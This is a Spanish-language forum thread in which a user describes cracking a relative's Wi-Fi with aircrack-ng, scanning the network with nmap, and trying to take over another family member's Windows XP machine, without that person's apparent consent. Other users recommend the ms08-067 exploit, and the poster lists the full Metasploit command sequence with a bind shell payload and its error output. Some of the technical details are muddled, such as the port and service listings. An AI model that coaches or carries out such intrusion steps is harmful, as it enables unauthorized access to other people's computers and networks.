Hola
Bien este es mi problema, hice una a puesta con mi tio de que le entraria a su ordenador y tener el control del sistema.Yo uso Linux

Lo primero que ice fue petarle el router con aircrack-ng para poder tener conexion a su red y asi poder entrarle, luego me conecto a traves de dhclient vale pos me conecto y dhclient me dice 1 cosa asi

DHCPACK of 192.168.1.34 from 192.168.1.1

yo entiendo esto decirme si me confundo 192.168.1.34 es mi ip y 192.168.1.1 la suya no?

Ok voy a nmap y ago esto

nmap 192.168.1.1/24

me sale esto mas o menos

PORT   STATE SERVICE
20/tcp open  ftp
23/tcp open  ssh
26/tcp open  telnet
83/tcp open  http
MAC Address: 00:2CXXXXXXXX

Ok y abajo otra cosa q es esto

Interesting ports on 192.168.1.32

PORT     STATE SERVICE
6551/tcp open  bittorrent-tracker
MAC Address: 00:16:XXXXXXXX <-------- otra mac creo q es mi primo q baja con el bittorrent y esta conectado ala red por wifi

Vale creo que ya e encontrado por donde entrar por bittorrent.
ok escaneo la ip  192.168.1.32 esta vez ago esto

nmap -O 192.168.1.32

Para saber q sistema usa on q ya lo sepa
Me pone q es windows xp SP2 O SP3

Ok hasta aki me e kedado que EXPLOIT LE TENGO Q LANZAR Y COMO CON METASPLOIT y si e hecho algo mal.

Gracias un saludo

Si como te comentaron 192.168.1.1 es la puerta de enlace en este caso "el router".

En ese caso en nmap usa la opcion -A que de da informacion de la version del programa que escucha en esos puertos, apartide de ahi buscas vulnerabiliades en securityfocus

sobre el metasploit habria que ver si este tiene el exploit necesario para alguna vulnerabilidad.

Saludos

intenta exploits para los bugs mas conocidos de windows como ms08-067.

usa metasploit

Hola

Use el exploit windows/smb/ms08_067_netapi pero cuando cargo el ataque con el commando exploit me dice error os digo los pasos que ago aver que ago mal:

use windows/smb/ms08_067_netapi

show options

set RHOST 192.168.1.32    <----------- es lo que me dio nmap de la vulnerabilidad de bittorrent

set PAYLOAD windows/shell/bind_tcp

show options

exploit         

y me dice esto

• Started bind handler
[-] Exploit failed: The host (192.168.1.32:445) was unreachable.

• Exploit completed, but no session was created.

no funciona donde esta el error.
Un saludo

No el RHOST es el HostRemoto, se indica al momento de escoger el PAYLOAD y/o exploit. El PAYLOAD es la accion a realizarse si se ejecuta el Exploit Correctamente.


cpu2 Mira.
   |   

Saludos!